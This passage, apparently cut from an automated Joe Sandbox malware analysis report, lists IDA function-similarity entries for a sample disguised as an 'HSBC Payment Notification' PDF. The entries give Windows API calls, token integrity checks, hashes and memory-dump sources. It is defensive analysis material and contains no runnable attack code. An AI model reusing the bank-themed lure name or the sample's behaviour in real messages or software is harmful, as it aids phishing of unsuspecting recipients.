• Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95

APIs
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89

APIs
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                                                                                    • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                                                                                                                    • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                                                                                    • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 02F1979E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: 4be3afc176c62104ef7d771525130a9172a340e0817448280353b45cc5c94892
                                                                                                                                                    • Instruction ID: f998dfb0d101f783272695e67483f77f4669e5ab8cf730cfae17945cb8d13de6
                                                                                                                                                    • Opcode Fuzzy Hash: 4be3afc176c62104ef7d771525130a9172a340e0817448280353b45cc5c94892
                                                                                                                                                    • Instruction Fuzzy Hash: 2D21A521D4E3909ED7268A2984647367FE06F522E8FCC858DE3D58B2D2C3B98409C793
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 96c929bf77b3b37bef83dc6561b6447fdcd5197876a84e0889d6f1de037c7794
                                                                                                                                                    • Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
                                                                                                                                                    • Opcode Fuzzy Hash: 96c929bf77b3b37bef83dc6561b6447fdcd5197876a84e0889d6f1de037c7794
                                                                                                                                                    • Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                                                                                                                      • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                                                                                      • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                                                                                                                      • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1396898556-0
                                                                                                                                                    • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                                                                                    • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                                                                                                                    • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                                                                                    • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 47647f3d04b386c0c2150db9e578cdfe8af40bf34edb4e6fd3868b4b8a472812
                                                                                                                                                    • Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
                                                                                                                                                    • Opcode Fuzzy Hash: 47647f3d04b386c0c2150db9e578cdfe8af40bf34edb4e6fd3868b4b8a472812
                                                                                                                                                    • Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                                                                                    • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                                                                                                                    • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                                                                                    • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                    • Opcode ID: 87fccc5edf4a387de68764ed7d51f5f0bba5ca0544cfb9e267408c5337a6cf56
                                                                                                                                                    • Instruction ID: d77753744174b75552d5053113ce1c69ebd91c424c82c509592fde871d5d27f3
                                                                                                                                                    • Opcode Fuzzy Hash: 87fccc5edf4a387de68764ed7d51f5f0bba5ca0544cfb9e267408c5337a6cf56
                                                                                                                                                    • Instruction Fuzzy Hash: 0021F76290E3C0AED3178729C41571BBFE05B96654F89C89EF1D58B2D2D3798808D7A3
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                                                                                                                    • Instruction ID: 772d3f2de97e4a3295a634e8ff1b07ab9ba467494f4d4c1bb2e9b048b5294e56
                                                                                                                                                    • Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                                                                                                                    • Instruction Fuzzy Hash: C5112831204B049FE3208F19C880B67B7F8EB44764F10C92EE9AA96A91D774F845CF64
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                                                                                                                                                    • Instruction ID: b26529ee9b914c12feaffd8856b12b4ff76ce3a38eeed91d3c5b717ccaf7fb48
                                                                                                                                                    • Opcode Fuzzy Hash: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                                                                                                                                                    • Instruction Fuzzy Hash: 7E01DFB9300902AFC301EB29D441D26F7A9FF8A314714812EE818C7702DB38EC21CBE4
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: efd3b46b1b600033ec526e97fb549c3f26ef05aa17feba7ce22dd9e358b415ba
                                                                                                                                                    • Instruction ID: ba98c84a74493c9132fe5ca0d54e236106a19fb28495d75048563f6538a5388b
                                                                                                                                                    • Opcode Fuzzy Hash: efd3b46b1b600033ec526e97fb549c3f26ef05aa17feba7ce22dd9e358b415ba
                                                                                                                                                    • Instruction Fuzzy Hash: 90018475D0A3009BEB24DF35C52573BB7A06BD56D4FC4454EE39A82251E7B4C014C783
                                                                                                                                                    APIs
                                                                                                                                                    • __lock_file.LIBCMT ref: 004248A6
                                                                                                                                                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2597487223-0
                                                                                                                                                    • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                                                                                    • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                                                                                                                    • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                                                                                    • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                    • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                                                                                    • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                                                                                                                    • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                                                                                    • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 3183f7d5e57e092c810b05d380156854195b4b04fd4d03243365d49dc19afada
                                                                                                                                                    • Instruction ID: b52d70fa1eaf49e61e76d7996f8a802cce43cee28cb294bfa942c4252ebf96e4
                                                                                                                                                    • Opcode Fuzzy Hash: 3183f7d5e57e092c810b05d380156854195b4b04fd4d03243365d49dc19afada
                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0E5A1C0C384CEEB25EA09C42833ABBB0AF452DEFCA845DDB9446595D7B98404CB52
                                                                                                                                                    APIs
                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2514874351-0
                                                                                                                                                    • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                                                                                    • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                                                                                                                    • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                                                                                    • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                                    • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                                                                                                                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                                    • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,?), ref: 02F1832A
                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: c94bb02921ff8ec454448331240915c213fc93ce3da814444e7b47ea336459dd
• Instruction ID: 96d660301db6a6546e1a9c6703c4ee1ec4847f336ba42900af741b111f570af5
• Instruction Fuzzy Hash: 8CE0C239B48BC1BFFA2B05204E01A367F28AB829C4FC40848BB4292065C3508C106278
APIs
Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: bbf16f2f1c5ab5d4e48369369ab1b9f1413f7c1ae64439ad48ba4aaee0de8c15
• Instruction ID: 67675a34bf86aa4b5535a413d63127c0a4e13e2d0f41c2e927e74a67bc360be8
• Instruction Fuzzy Hash: DFE04F3054E3869FE3429F30C10431EBFE0AF86215F448D9DE9D446481E7B4C54AD742
APIs
Memory Dump Source
